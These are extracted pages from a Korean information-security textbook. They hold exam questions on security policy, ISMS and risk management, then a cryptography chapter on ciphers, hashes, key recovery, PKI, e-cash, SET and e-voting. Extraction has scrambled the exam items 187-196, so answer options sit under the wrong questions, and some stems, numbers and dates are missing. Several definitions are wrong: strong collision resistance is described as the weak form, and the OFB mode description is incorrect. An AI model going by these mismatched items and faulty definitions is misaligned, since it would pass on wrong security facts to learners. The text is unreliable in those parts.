234 177. 경영진 정보보안포럼이 필요한 이유는? 1 보안 이슈와 관련된 일반적인 승인절차 및 승인 메커니즘에 대한 논의를 위해서 2 일반 대중들과 보안 이슈에 관련한 메커니즘 에 대해 논의하기 위하여 3 직원들과 작업 관련 이슈들에 대해 논의하기 위하여 4 직원들에게 보안 이슈에 대한 경영진 포럼이 있다는 것을 보여주기 위해서 178. 다음 중 프로세스 개선의 일반적인 제약사 항은 무엇인가? 1 상향식 (Bottom-up) 변경이 이루어 지므로 2 역량 부족(lack of Competence) 3 침해사고에 의한 불안정 4 경영진은 장기적인 솔루션에 집중하므로 179. 보안 정책의 효율성을 감시하기 위해 사용 되는 방법은? 1 리뷰 2 절차 3 표준조사 4 지침 180. 비밀유지동의서(NDA)를 작성한 경우에도, 계약을 확실히 하기 위해서 추가적으로 필 요한 사항은? 1 작업이 시작되기 전에 상세 작업에 대한 정책 을 마련하고 끝나는 시기를 명시함. 2 작업을 수행 기간 동안의 개인의 책임을 분명히 함. 3 해당 조직의 보안 정책과 지침 준수에 대해서 제 3자와 조직 사이의 오해가 없도록 함. 4 정보의 검토 또는 작업을 어떤 사람이 수행 할 지를 분명히 함 다음 중 좋은 보안 정책의 어떤 특징이 주 기적인 리뷰를 명시하는가? 1 시간적 측면 2 달성 측면 3 특수성 4 실무적 측면 5 평가 측면 의 구현시, 언제 CEO가 관여하는 것이 좋은가? 1 문서를 리뷰 하여 사인을 받을 때 2 최초단계에서 3 구현단계의 어느 시점에서 4 전혀 관여할 필요 없음 183. 다음 중 어떤 재산목록의 구성요소가 데이 터베이스의 구동 및 백업을 구동하는 소프트웨 어, 서버, 라우터의 접근 제어와 같은 것들을 포 함하는가? 1 외부 2 정보 3 시설 4 인프라스트럭처 184. 비즈니스 행위에 대한 중단 또는 재산상의 피해 및 손실을 막는 것은 모두 7799의 통제 목 적의 어느 부분에 해당되는가? 1 자산 보호 2 자산 보안 3 장비 보안 4 장비 손실 완화 185. 일반적으로 접하게 되는 두 가지 주요 정책 유형은 무엇인가? I. 구현 (Implementation) II. 수동적 (Reactionary) III. 비활성 (Non-active) IV. 능동적 (Proactive) 1 II와 III 2 II와 IV 3 I과 II 4 I과 III 5 I과 IV 186. 보호되고 있는 자산(protected assets) 을 정의한다는 의미는 무엇인가? 1 중요하지 않은 자산으로 정의한다는 의미 2 보다 중요한 자산으로 정의한다는 의미 3 보안상의 의미를 가지는 자산으로 정의한다는 의미 4 단순히 라벨을 붙여 분류한다는 의미 234
235 187. 보안 정책의 어느 부분이 보안 정책의 목표 (objective)를 기술하는가? 192. 누가 잔여 위험을 수용할지를 최종적으로 결정하는가? 1 관련 문서 2 징계 행위 3 행위 4 책임 5 소유권 6 목적(goal) 188. 다음 중 ISMS의 어떤 스텝이ISMS의 확장과 관련이 있는가? 1 스텝 12 (유지 및 개선) 2 스텝 11 (감시 및 리뷰)와 12 (유지 및 개선) 3 스텝 10 (훈련 및 보안의식수준향상) 4 스텝 11 (감시 및 리뷰) 189. 다음 중 ISO 17799의 암호화 통제는 무엇 인가? I. 암호화 (Encryption) II. 전자 서명 (Digital signatures) III. 키 관리 (Key management) IV. 패스워드 (Passwords) V. 프로토콜 (Protocols) 1 경영진 2 시스템 관리자 3 정보보안 담당자 4 정보보안 시스템 관리자 193. 다음 중 일반적인 정보보안 정책의 요소가 아닌 것은? 1 목적(Purpose) 2 배경(Background) 3 범위(Scope) 4 정책(Policy Statement) 5 사명(Mission Statement) 194. 다음 중 무엇이 위험관리의 주요 목적인가? 1 위험 식별 2 수용 가능한 수준으로 위험을 감소시킴 3 위험 통제 4 각 위험과 연관된 손실 최소화 1 I, II, 및 III 3 I, III, 및 V 2 II, III, 및 IV 4 II, IV, 및 V 195. "보안 인프라는 관리적, 기술적 ( ) 보안 통 제의 조합이다"에서 ( )에 적합한 말은? 190. 다음 중 어떤 기법이 기정의된 분산 (predefined distribution)에 기반 하여 랜덤 값의 선택을 위해 사용되는가? 1 이벤트 트리(Event tree) 2 결함 트리(Fault tree) 3 확률적인(Stochastic) 방법 4 정량적인(Quantitative) 방법 191. 탐지, 대응 및 노출 기간 등의 이벤트 가능 성에 대한 스프레드시트를 작성하는 것이 매우 유용하다. 경영진에게 비용에 의한 선택을 가능 하도록 하게 하기 위해서, 이러한 열에 무엇이 연관되어야 하는가? 1 고려해야 할 예측 데이터 2 업체의 가격 3 경쟁사 분석 4 최상의 케이스 및 최악의 케이스 예측 5 문서화에 대한 연혁 데이터 1 물리적 2 정책적 3 절차적 4 침입탐지시스템 196. 다음 중 정보보호 생명주기에 포함되는 사 항은? I. 방지 (Prevention) II. 탐지 (Detection) III. 대응 (Response) IV. 억제 (Deterrence) V. 교정 (Correction) 1 I, II, 및 III 2 I, IV, 및 V 3 II, III, 및 IV 4 II, IV, 및 V 235
236 제 4장. 암호학 제 1절. 암호 개론 chapter 1. 암호 개론 chapter 2. 암호 알고리즘 제 2절. 암호 응용 프로토콜 chapter 1. 영지식 증명 프로토콜 chapter 2. 전자 화폐 프로토콜 chapter 3. SET(전자 지불 프로토콜) chapter 4. 동전 던지기 프로토콜(Coin Flipping) chapter 5. 전자 투표 프로토콜 제 3절. 암호 응용 기술 chapter 1. PKI chapter 2. 전자서명 chapter 3. 전자봉투 chapter 4. DRM 과 워터마킹 chapter 5. PMI 제 4절. 암호학 문제 풀이 chapter 1. 종합 문제 236
237 제 1절. 암호 개론 chapter1. 암호 개론 가. 암호화 개요 암호화란 누구나 읽을 수 있는 평문(plain text)을 권한이 없는 제 3자가 알아볼 수 없는 형태(암호문) 로 재구성하는 과정을 말하며, 암호화의 역과정으로 암호문을 평문으로 복원하는 것을 복호화라 말한 다. 암호화는 인류 역사상 수천 년 전부터 군사적인 용도로 사용되어 왔으며, 오늘날 인터넷 기술의 발달 과 함께 전자상거래의 확산으로 인해 정보통신망을 통해 유통되는 다양한 중요정보를 암호화하여 사용 되고 있다. 현재 대부분의 조직이 침입자의 악의적인 공격으로부터 중요한 정보를 보호하기 위해 침입차단시스템, 침입탐지시스템, 바이러스 방역 등의 정보보호 시스템을 운영하고 있다. 그러나 중요 정보에 대한 완벽 한 방어는 불가능하므로 정보 자체에 대한 보호 수단으로 암호화가 사용된다. 나. 암호 용어 다음 [표 2-1]은 암호 용어에 대한 정의이다. 237
238 다. 암호화 주요 기능 o 전달 과정의 기밀성 보장 o 정보의 무결성 보장 o 송신자와 수신자의 정당성 보장 라. 암호화 원리 다음 [표 2-2]는 일반적인 암호화 원리이다. 238
239 chapter2. 암호 알고리즘 가. 관용키(대칭키) 암호 알고리즘 (1) 개요 암호화에 사용하는 키(암호화키)와 복호화에 사용하는 키(복호화키)가 서로 동일한 암호화 방식으로, 전 문의 송수신을 위하여 송신자와 수신자는 사전에 암 복호화에 사용하는 키를 공유 및 보유하고 있어야 한다. 예를 들어 A 라는 사용자가 3명의 서로 다른 사용자에게 암호화된 문서를 전송해야할 경우 각각 하나 씩, 총 세 개의 관용키(대칭키)를 보유하고 있어야 한다. 따라서 이 방식에 있어서의 중요한 관건은 해 당 관용키(대칭키)의 안전한 분배 및 관리 방법에 있다. (2) 특징 o 비교적 구현이 용이 o 실행 속도가 빠름 o 키 분배 및 관리가 어려움 o 거래쌍방이 동일한 키를 사용하는 관계로 인증 및 송수신 부인 방지가 보장되지 않음 (3) 관용키(대칭키) 알고리즘 종류 다음 [표 2-3]은 관용키(대칭키) 암호 알고리즘 종류이다. 239
240 (4) 암호화 시스템 분류 다음 [표 2-4]는 관용키(대칭키) 암호 알고리즘을 암 복호화에 사용되는 메시지 크기에 따라 분류한 것 이다. o 블록 암호화 운영 모드 - ECB : 평문(Plaintext) 블록은 각각 독립적으로 암호화되어 암호문(Ciphertext) 블록을 생성한다. - CBC : 각각의 평문 블록은 이전의 암호문 블록과 XOR된 후에 암호화된다.(앞서 암호화한 블록을 다음 블록 의 seed로 사용하는 방법). - CFB : 독립적으로 움직이는 sequence data 블록 S가 존재하여 각각의 평문 블록은 이전의 S (i-l)를 암호화한 S(i)와 XOR되어 암호문 블록을 생성한다. - OFB : 이전의 암호문 블록은 Output되는 동시에 암호화되어 현재의 평문과 XOR된 후에 암호문 블록을 생성 한다. 나. 공개키(비대칭키) 암호알고리즘 (1) 개요 암호화할 때 사용하는 키(암호화키)와 복호화할 때 사용하는 키(복호화키)를 별도로 사용하는 방식으로, 사용자는 상대방에게 공개하는 공개키(Public Key)와 자신만이 비밀로 보유하고 있는 개인키(Private Key)를 가진다. 공개키로 암호화한 암호문은 키를 생성한 자신이 비밀로 유지하고 있는 개인키로만 해독이 가능하고, 역으로 개인키로 암호화한 암호문은 자신의 공개키로만 해독이 가능하도록 구현함으로써 비밀키 방식 의 키 분배 및 부인방지 문제를 해결한다. 240
241 (2) 특징 o 키 분배가 용이 o 관용키 방식에 비해 관리할 키의 개수가 적음 - n명이 통신할 경우 관용키 암호 시스템에서는 n(n-1)/2개의 키가 필요하나, 공개키 방식의 경우 2n개가 필요 o 디지털 서명을 제공할 수 있음 o 구현이 어렵고 실행 속도가 느림 - 관용키 암호화방식과 공개키 암호화방식의 대표적인 알고리즘인 DES와 RSA의 암호화 속도를 비교해 볼 때 DES가 약 1000배 정도 빠름(RSA 처리속도: 1000 bps, DES:100만 bps) (3) 보안성 o 기밀성 : 수신자의 공개키로 암호화하는 경우 수신자 이외에는 암호문을 해독할 수 없음(수신자의 개인키로만 복호화 가능) o 사용자 인증 : 송신자의 개인키로 암호화하는 경우 송신자 이외에는 암호화할 수 없으므로 송신인에 대한 인증을 보장함 o 송신 부인방지 : 송신자의 개인키로 암호화하는 경우 송신자 이외에는 암호화할 수 없으므로 송신 사실에 대한 부인방지 가능 다음 [표 2-5]는 관용키(대칭키)와 공개키(비대칭키) 암호 알고리즘간의 비교표이다. 241
242 다. 해쉬 알고리즘 (1) 해쉬 알고리즘 개요 해쉬 알고리즘(H 혹은 Hash로 표기)은 임의의 길이의 입력 메시지를 고정된 길이의 출력값으로 압축 시켜 주는 함수로, 데이터의 무결성 검증과 메시지 인증에 사용된다. (2) 해쉬 알고리즘 성질 o 일방향성 : 주어진 해쉬값 h에 대해서 H(x) = h 를 만족하는 를 찾는 것이계산적으로 불가능하다. o 강한 충돌 회피성 : 주어진 x에 대해 'H(x)=H(y)'를 만족하는 임의의 입력 메시지 y (x와 같지 않은 값)를 찾는 것이 계산적으로 불가능하다. (3) 해쉬 알고리즘 종류 일반적으로 널리 쓰이는 해쉬 함수로는 MD5, SHA1, RIPEMD160, TIGER 등이 있다. 다음 [표 2-6]은 각 해쉬 알고리즘에 대한 간단한 설명이다. o MD5 : 널리 사용된 해쉬 알고리즘이지만, 충돌 회피성에서 문제점이 있다는 분석이 있으므로 기존 의 응용과의 호환으로만 사용하고 더 이상 사용하지 않도록 하고 있다. o SHA1 : DSA에서 사용하도록 되어 있으며 많은 인터넷 응용에서 기본 해쉬 알고리즘으로 사용된다. o SHA256, SHA384, SHA512 : AES의 키 길이인 128, 192, 256 비트에 대응하도록 출력 길이를 확장 한 해쉬 알고리즘이다. o RIPEMD128, RIPEMD160 : RIPE 프로젝트의 RIPEMD나 MD4, MD5를 대신하기 위하여 디자인된 해쉬 알고리즘이다. 128 비트의 출력을 내는 RIPEMD128은 충돌 회피성 에서 문제점이 있으며, RIPEMD160은 효율성은 떨어지지만 안전성을 높인 것으로 많은 인터넷 표준들에서 널리 채택되고 있다. 242
243 o RIPEMD256과 RIPEMD320 : 각각 RIPEMD128과 RIPEMD160을 확장한 것이다. o HAS160 : 국내 표준 서명 알고리즘 KCDSA를 위하여 개발된 해쉬 알고리즘으로 MD5와 SHA1의 장점을 취하여 만들어진 것으로 현재 TTA 표준으로 제정 중에 있다. o TIGER : 64 비트 프로세서에 최적화되어 있어 64 비트 프로세서에서는 매우 빠르다. 라. 키 관리 (1) 키 관리 및 인증 암호 시스템의 안전성과 신뢰성은 주어진 보안 매개변수들에 대한 관리와 보호에 기반을 두고 있다. 아무리 견고한 암호시스템이라 할지라도 만약 키 관리가 소홀하다면 그 암호 시스템은 무용지물이 될 수 있다. 키 관리의 목적은 대칭키 암호 시스템 또는 공개키 암호 시스템에서 사용되는 암호학적 키들을 안전하 게 다루기 위해 키의 생성, 등록, 확인, 분배, 설치, 저장, 파생, 보관, 취소, 말소 그리고 폐기 등과 같은 일련의 절차를 제공하는 것이다. (표 2-7 참고) 243
244 공개키 암호 시스템에서 개인키는 그 소유자만이 알고 있고 공개키는 공개된다. 공개키를 공개하는 문 제는 메커니즘이 자체적으로 안전하지 않아 누구나 쉽게 접근하여 정보를 변경할 수 있으므로 공개키 의 위 변조 문제를 야기할 수 있다. 따라서 공개된 공개키가 위 변조되지 않았음을 보장하는 문제, 즉 공개키의 무결성을 보장하기 위해 등장한 것이 공개키 인증서 개념이다. 인증서(Certificate)란 개인 또는 단체의 공개키를 인증하는 전자적인 증명 문서이다. 인증서에는 만기 일, 인증서를 발행한 인증기관의 이름 그리고 일련번호 등의 정보가 포함된다. 가장 중요한 것은 인증 서에 인증서 발행자(인증기관)의 전자서명이 들어 있다는 것이다. 가장 널리 인정되는 인증서의 형식은 ITU-T X.509 국제 표준에 의해 정의된다. 그리고 인증서를 발행, 관리해주는 인증기관은 인증서 요구자 의 신원과 공개키를 보증할 수 있는 신뢰성 있는 중앙기관이다. 인증서 위조를 방지하기 위해서 인증기관의 공개키는 반드시 신뢰할 수 있어야 하므로 인증기관은 공 개키를 공개하거나 공개키의 유효성을 입증할 수 있는 상위급 인증기관이 발행한 인증서를 제공하여야 한다. 인증기관들은 하위 인증기관들에게 인증서를 발행한다. 최상위 인증기관의 공개키는 모든 사람들에게 알려져 있어 사용자들의 인증서는 최상위 인증기관에서 신뢰하는 인증기관까지의 인증 경로를 검증함 으로써 상대방의 인증서를 검증 한다. (그림 2-2 참고). 244
245 (2) 키 복구 (가) 키 복구 개요 암호문의 소유자가 아닐지라도 복호 능력을 사전에 약속된 특정한 조건 하에서 허가된 사람에게 제공 하는 암호시스템이 필요하다. 합법적인 경우에 한하여 정당한 사용자 또는 기관이 암호키가 없이도 암 호문의 복호가 가능하게 하는 기술을 키 복구(Key Recovery) 기술이라 한다. (나)키 복구 방식 암호키 복구 기술은 크게 키 위탁(Key Escrow) 방식, 캡슐화(Encapsulation) 방식 그리고 제 3 기관 (TTP, Trusted Third Party) 방식으로 나눌 수 있다. o키 위탁(Key Escrow) 방식 - 키 위탁 방식은 복구될 사용자의 비밀키, 비밀키의 부분 또는 키 관련 정보를 하나 이상의 신뢰기관 에 위탁하는 방식으로, 위탁되는 키는 사용자가 오랫동안 사용하게 되는 키(long-term key)이다. 이 방식에서는 사용자의 비밀키가 위탁 기관에 직접 맡겨져야 하므로 개인의 프라이버시가 전적으로 위탁 기관에 의존한다는 문제점을 안고 있다. - 그러므로 위탁 기관의 신뢰성이 매우 중요한 문제이며 이를 보장하기 위한 방법으로 두 개 이상의 위탁기관을 이용하는 비밀 분산(secret sharing) 개념이 주로 사용되고 있다. 이러한 키 위탁 방식은 유사시에 키 복구를 확실하게 할 수 있다는 장점이 있으며 위탁 기관의 신뢰성만 보장된다면 편리 하고 안전한 키 복구 방식이다. 이 방식에서 실제 키의 위탁은 암호 시스템 설정 시에 일어난다. - 대표적인 키 위탁 방식의 암호키 복구서비스와 시스템으로는 베리사인사의 Key Management Service, 인트러스트사의 Authority, 넷스케이프사의 CMS(Certificate Management System), KISA의 KMI 시스템 등이 있다. o 캡슐화(Encapsulation) 방식 - 캡슐화 방식은 키 위탁 방식과는 달리 암호문을 생성하는 각 세션마다 키를 복구해 낼 수 있는 정보 를 포함하는 필드를 생성해서 해당 암호 메시지에 부가시키는 방식으로 실제적인 키 위탁이 일어나 지는 않는다. 법 집행 기관의 키 복구는 복구 기관의 비밀정보를 이용하여 암호화된 데이터에 부가 된 복구 필드를 복구한 후 목적키를 얻을 수 있다. - 그러므로 복구되는 키가 사용자의 long-term 키가 아니라 세션키가 되도록 할 수 있기 때문에 도청 기관의 복구 능력을 제한할 수 있게 되어 사용자의 입장에서는 키 위탁 방식보다는 안전에 대한 확신 을 가질 수 있다. 또한 기존의 프로토콜에서 확장 필드가 존재한다면 이를 이용하여 복구 필드를 부가 시킴으로써 구현 비용의 절감과 높은 호환성이 가능하다는 장점이 있다. 그러나 복구 필드를 사용자가 생성하므로 이 필드에 대한 사용자의 부정이 충분히 가능하다. 그러므로 복구 필드의 유효성 확인 과정이 반드시 필요하며 복구 기관의 신뢰성도 키 위탁 방식에서와 마찬가지로 보장되어야 한다. - 대표적인 캡슐형 방식의 암호키 복구 서비스와 시스템으로는 마이크로소프트사의 EFS(Encryption File System), IBM사의 SecureWay, TIS사의 RecoveryKey, AT&T사의CryptoBackup 등이 있다. 245
246 o제 3 기관(TTP : Trusted Third Party) 방식 - 제 3의 신뢰기관 기반 키 복구 방식은 신뢰할 수 있는 제 3자(TTP)가 암호 통신에 사용될 사용자의 비밀키를 직접 생성하고 사용자에게 분배하는 방식으로 필요 시 사용자의 Long-term 키를 직접 복구 하는 방식이다. 사용자들의 비밀키를 TTP로 지정된 기관에서 직접 생성ㆍ분배하므로 각 기관들의 신뢰성 보장이 절대 적이어야 한다. - 대표적으로 영국의 GCHQ 프로토콜 등이 있다. 마. 국내 표준 알고리즘 인터넷 보안 서비스의 호환성을 위해서는 표준화된 암호 알고리즘을 사용하여야 한다. 대표적인 국내 표준 알고리즘은 다음과 같다. (1) SEED o 국내 표준 암호(대칭키) 알고리즘 o 입출력 처리 기본 단위(블록 크기)가 128bits, 입력키의 크기가 128bits, 라운드 수가 16라운드인 블록 암호 알고리즘 o DES와 같은 Feistel 구조를 가짐 o 1999년 TTA에서 표준으로 제정함(TTA.KO , '99. 9) o 현재 ISO/IEC국제 표준 암호 알고리즘 후보로 제출함 (2)KCDSA (Korea Certification-based Digital Signature Algorithm) o 국내 표준 전자서명 알고리즘 o 이산대수 문제의 어려움을 기반으로 한 전자서명 알고리즘 o 인증서 기반의 전자서명 알고리즘 o 1998년 TTA에서 표준으로 제정함 o ECKCDSA(Certification-based Digital Signature Algorithm using Elliptic Curves) - KCDSA를 타원곡선을 이용하여 변형한 전자서명 알고리즘 - 다른 공개키 시스템의 키 길이에 비해서 훨씬 짧은 키를 사용하여도 동일한 안전도를 제공 - 스마트 카드, 무선 통신 등과 같이 메모리와 처리 능력이 제한된 분야에서 매우 효과적임 년 TTA에서 표준으로 제정함(TTAS.KO ) (3) HAS-160(Hash Algorithm Standard-160) o 국내 표준 해쉬 알고리즘 o KCDSA에서 사용될 목적으로 만들어진 해쉬 알고리즘 o 512bits 블록 단위로 처리하여 160bits의 해쉬 코드를 출력 o 1998년 TTA에서 표준으로 제정 246
247 제 2절. 암호 응용 프로토콜 chapter 1. 영지식 증명 프로토콜 영지식 증명(Zero-knowledge Proof)은 증명자가 어떤 사실의 정당성에 관한 사실만을 검증자에게 전달 하는 방식으로 어떠한 정보도 노출시키지 않는다는 의미를 갖고 있다. 즉 증명자가 자신이 아는 비밀 정보를 검증자에게 전송하지 않고, 검증자에게 자신만이 비밀정보를 갖고 있다는 증명을 할 수 있는 증명 방식이다. 영지식 증명은 일반적으로 대화형 증명 방식(Interactive Protocol)의 형태를 취한다. 대화형 증명 방식 은 증명자와 검증자가 일련의 질문과 답으로 구성된 대화를 통해 증명을 하는 방식으로, 영지식 증명 을 영지식 대화형 증명 방식(Zero-Knowledge Interactive Proof)이라고도 한다. chapter 2. 전자화폐 프로토콜 가. 전자화폐 정의 전자화폐란 전자상거래에서 지폐, 동전 등의 화폐 역할을 수행하기 위해 디지털 데이터로 구성된 화폐 를 말한다. 나. 전자화폐 요구 사항 전자화폐가 디지털 정보이므로 데이터로서의 취급이 용이한 반면, 노출 및 위조 등을 통해 기밀성과 무결성이 침해될 가능성이 많다. 전자화폐가 오프라인상의 화폐처럼 온라인상에서 사용되기 위해서는 다음과 같은 요구 사항이 충족되어야 한다. o 디지털 정보화(Independence): 완전한 디지털정보만으로써 실현되는 것 o 재사용 금지(안전성, Security): 복사, 위조 등으로 인한 부정사용을 할 수 없는 것 o 익명성(Privacy, Untraceability): 이용자의 구매에 관한 프라이버시가 상점이나 은행이 결탁해도 노출 되지 않는 것 o 오프라인성(Offline): 상점에서의 지불시 처리를 오프라인으로 처리할 수 있는 것 o 양도 가능성(Transferability): 타인에게 양도가 가능할 것 o 분할 이용 가능성(Divisibility): 액면 금액에 맞게 분할해서 사용할 수 있는 것 o 부정 사용자의 익명성 취소(Anonymity Revocation of illegal user): 불법적인 거래에 있어서 세금 및 거래 관계에 관한 기록을 조사할 수 있을 것 247
248 다. 전자화폐 프로토콜 구성 전자화폐의 기본 프로토콜은 3단계로 구성된다. 은행이 사용자에게 전자화폐를 발급해주는 인출 단계 (withdrawal phase), 물건을 사고 발행하는 단계에서 사용자가 은행으로부터 받은 전자화폐를 구매대금 으로 상점에 지불하는 지불 단계(payment phase), 그리고 사용자로부터 받은 전자화폐를 예치하여 상 점의 계좌로 자금을 이체시켜 주는 결제 단계(deposit phase)로 구성된다. (1) 인출 프로토콜 은행에서 현금을 인출하는 과정으로 신원과 계좌번호, 찾고자하는 액수를 기록한 후 확인을 거쳐 전자 화폐를 인출한다. 인출 프로토콜은 이용자가 은행으로부터 전자화폐를 인출하는 단계의 프로토콜이다. (2) 지불 및 결제 프로토콜 인출된 전자화폐를 사용하는 지불 프로토콜은 이용자와 상점 간에 상품과 금액의 협상이 이루어지면 이용자는 상품을 지정해서 전자화폐를 상점에 지불하고, 상점은 전자화폐의 이중 사용 유무를 은행에 검사의뢰 하여 은행은 전자화폐에 부가되어 있는 은행의 서명을 확인하고 동일한 전자화폐가 과거에 예치된 적이 있는가를 은행 데이터베이스를 이용하여 조사한다. 예치되어 있지 않으면 새로 예치하고 데이터베이스에 이 전자화폐를 등록한다. 상점은 전자화폐가 은 행에 정확히 예치된 것을 확인하면상품을 이용자에게 배달한다. 가. SET 개요 chapter 3. SET(전자 지불 프로토콜) SET(Secure Electronic Transaction)은 인터넷을 이용한 전자상거래에서의 안전한 지급 결제 수단을 제 공하기 위하여 비자와 마스터 카드사가 공동으로 개발한 신용과 직불카드 전문용 결제 프로토콜이다. SET은 전자상거래 판매업자, 고객, 지급정보 중계기관간 상호 인증, 거래 정보의 기밀성 및 무결성을 최대한 보장하도록 설계되었고, 전자상거래 활성화를 위해 국제표준을 목표로 하고 있다. 기술지원사 : GTE, IBM, Microsoft, Netscape, SAIC, Terisa, Verisign ' : 초안 발표 ( ' 일 버전 1.0 발표 ) 상호 운용성 보장 : SET을 적용한 각 사의 제품 간 상호 운용성 보장을 위하여 SET 적용 제품은 SAIC(Science Applications International Corporation)에서 테스트 및 인증을 거치도록 하고 있음 나. SET 보안 서비스 SET에서는 개방된 네트워크에서의 보안 대책에 필수적인 다음과 같은 보안 서비스를 제공하고 있다. o 기밀성(Confidentiality) : 통신회선상의 비밀정보 암호화 기능 o 무결성(Integrity) : 통신회선상의 정보변질여부 확인 기능 o 인증(Authentication) : 통신 상대방의 정당성 확인 기능 o 부인방지(Non-Repudiation) : 통신 상대방 간 송,수신사실 부인 방지 기능 248
249 SET에서는 전자상거래 참여자 간의 데이터 송수신에 필요한 보안 사항만 규정하고 있는 관계로 부 적격자에 의한 내부 시스템으로의 침입 등을 방지하기 위한 시스템 보안 대책(침입차단시스템 구축 등)은 해당기관에서 별도로 수립해야 한다. 다. SET 적용 범위 SET은 전자상거래에 필요한 여러 처리절차 중 카드를 이용한 지급결제처리절차에 한해 정의하고 있으 므로 상품 선택, 배송 방법 등 지급결제 관련 이외의 처리 절차와 현금, 수표 등 카드 이외의 결제수단 에 대해서는 별도의 정의가 필요하다.비자와 마스터 카드사는 현금, 수표 등 카드 이외의 결제수단에 대한 처리절차를 정의하기 위한 Super-SET과 SET에 IC 카드를 접목하기 위한 C-SET을 별도로 준비하 고 있다. 이중 서명(Dual Signature)은 SET에서 도입된 기술로, 고객의 결제정보가 판매자를 통하여 해당 지급정보중계기관(이하 'PG')으로 전 송됨에 따라 고객의 결제정보가 판매자에게 노출될 가능성과 판매자에 의한 결제 정보의 위/변조의 가 능성을 제거한다. 즉, 판매자에게 결제정보를 노출시키지 않으면서도 판매자가 해당 고객의 정당성및 구매 내용의 정당 성을 확인할 수 있고 PG는 판매자가 전송한 결제요청이 실제 고객이 의뢰한 전문인지를 확인할 수 있 도록 하는 기술이다. 은닉 서명(Blind Signature)은 D. Chaum에 의해 제안되었으며, 기본적으로 전자서명을 만들 수 있는 서명자와 서명 받을 메시지를 제공하는 송신자로 구성되어 있는 서명 방식으로, 송신자의 신원과 (메시지, 서명)쌍을 연결시킬 수 없 는 특성을 유지할 수 있는 서명이다. 은닉 서명은 서명하고자 하는 메시지의 내용을 공개하지 않고 메 시지에 대한 서명을 받고자 할 때 사용된다. 서명자의 익명성과 송신자의 익명성을 보장함으로써 기밀 성의 보장을 가능하게 하는 특수한 전자서명이다. 서명자의 익명성이란 직접 서명한 사용자가 서명발급 이후에 전자서명(메시지와 서명의 쌍)의 유효성 을 확인할 수 있으나, 자신이 언제 누구에게 발행했는지는 확인할 수 없도록 하는 것을 말하며, 송신자 의 익명성이란 검증자가 전자서명 내역(메시지와 서명의 쌍)의 유효성을 확인할 수 있으나, 송신자의 신분을 확인할 수 없도록 하여 송신자의 익명성을 보장하는 것을 말한다. 이러한 은닉 서명은 전자화 폐의 가치를 증명해주기 위해 화폐 발급자가 사용자의 정보를 볼 수 없는 상태에서 서명을 해줄 수 있 는 새로운 종류의 서명 방식으로 전자투표에서도 사용된다. 249
250 chapter 4. 동전 던지기 프로토콜동전 던지기(Coin Flipping) 동전 던지기 프로토콜동전 던지기(Coin Flipping)은일방향 해쉬 함수를 이용하여 상대방의 부정을 확인할 수 있도록 하며 도박성이 있는 인터넷 포커 고스톱에 응용할 수 있다. chapter 5. 전자투표 프로토콜 안전하고 신뢰할 만한 전자투표 시스템을 구현하기 위해서는 다음과 같은 요구사항이 고려되어야 한 다. o 완전성(Completeness): 모든 유효투표가 정확하게 집계되어야 하며, 최종 집계에서 정당한 투표가 제거되지 않아야 한다. o 건전성(Soundness): 부정한 투표자에 의해 투표가 방해되지 않아야 한다. o 기밀성(Privacy): 투표의 결과로부터 투표자의 신분을 확인할 수 없어야 한다.(투표자의 익명성 보장). o 단일성 또는 이중투표 불가성(Unreusability): 정당한 투표자가 두 번 이상 투표에 참여할 수 없어야 한다. 즉 한번만 투표할 수 있어야 한다. o 검증성(Verifiability)은 투표 결과를 속일 수 없도록 누구라도 투표 결과를 검증할 수 있어야 한다. o 적임성 또는 선거권(Eligibility): 투표 권한을 가진 자만이 투표할 수 있어야 한다. o 공정성(Fairness): 투표의 중간결과가 투표에 영향을 주지 않아야 한다. 250
251 제 3절. 암호 응용 기술 chapter 1. PKI 가. PKI 정의 공개키 기반 구조(PKI, Public Key Infrastructure)는 공개키 인증서를 발행하고 그에 대한 접근을 제공 하는 인증서 관리 기반구조 로 정의되며, 정보시스템 보안, 전자상거래, 안전한 통신 등의 여러 응용분 야에서 인증서(certificate)의 사용을 용이하도록 하는 정책, 수단, 도구 등을 수립하고 제공하는 객체들 의 네트워크(Infrastructure)이다. 여기에서 인증서란 인증서 소유주에 대한 확인 정보 및 소유주의 공개키를 인증기관의 비밀키로 암호 화한 것으로써 실생활의 인감증명서와 비슷한 역할을 한다. 나. PKI 보안 기능 PKI 는 다음과 같은 5가지의 보안 기능을 제공한다. o 기밀성 : 선택된 수신자만이 정보를 열람할 수 있도록 함 o 접근 제어 : 선택된 수신자만이 정보에 접근하도록 허락함 o 무결성: 정보가 전송 중에 변경되지 않았음을 보장함 o 인증 : 정보의 원천지를 보장함 o 부인 방지 : 정보를 송 수신자가 송 수신한 사실을 보장함 다. PKI 구성 요소 PKI 의 구성요소는 크게 정책승인기관(PAA), 정책인증기관(PCA), 인증기관(CA), 등록기관(RA), 디렉토리, 그리고 사용자로 구성된다. 251
252 다음 [표 2-8]은 PKI 구성 요소에 대한 설명이다. 라. PKI 활용 인터넷 기술의 발달과 대중화로 인해 인터넷 뱅킹과 온라인 쇼핑 등 전자상거래가 활성화되고 있다. 전자상거래 시 사용자 공개키의 정당성(사용자 인증)을 보장하기 위하여 사용자는 전자상거래 이용 전 에, 자신의 공개키를 신뢰성 있는 인증기관의 인증서 발급을 통해 공증 받도록 하고 거래 상대방은 인 증기관의 인증서를 확인함으로써 사용자의 정당성을 확인할 수 있도록 한다. 따라서 신뢰성 있는 인증기관의 설립이 먼저 수행되어야 한다. 전자상거래 상대방의 인증서를 해당 인증기관의 공개키로 복호화하여 거래상대방의 공개키를 획득한 후, 그 공개키를 이용하여 거래상대방의 전자서명을 확인한 결과가 일치할 경우 해당 거래당사자를 인 증기관이 인정한 정당한 거래자로 처리한다. 252
253 인증서의 정당성 여부를 확인하기 위해서는 인증서를 발급한 인증기관의 공개키가 필요하고 이 경우 다시 해당 인증기관의 공개키의 정당성을 보장하는 것이 문제가 된다. 따라서 인증서를 사용 또는 검 증하는 객체에게는 최상위 인증기관에 대한 공개키(Root Key)만을 공개하고 실제 인증서를 발급해 준 인증기관의 정당성은 최상위 인증기관의 공개키를 사용하여 단계적으로 풀어감(Traverse)으로써 확인토 록 한다. 이때 최상위 인증기관의 공개키는 관련 소프트웨어에 미리 등록해야만 한다. 가. 전자서명 정의 chapter 2. 전자서명 전자서명(Digital Signature)은 서명자 인증, 메시지의 위 변조방지, 송신 부인방지 등의 기능을 제공하 는 암호화 기술로 공개키 암호화 방식에서의 개인키를 이용한 메시지 암호화는 서명 당사자밖에 할 수 없다는 점을 이용하여 구현한 것이다. 나. 전자서명 처리 절차 o 송신자는 송신할 메시지에 대해 해쉬 함수를 적용하여 특정 비트의 메시지 다이제스트를 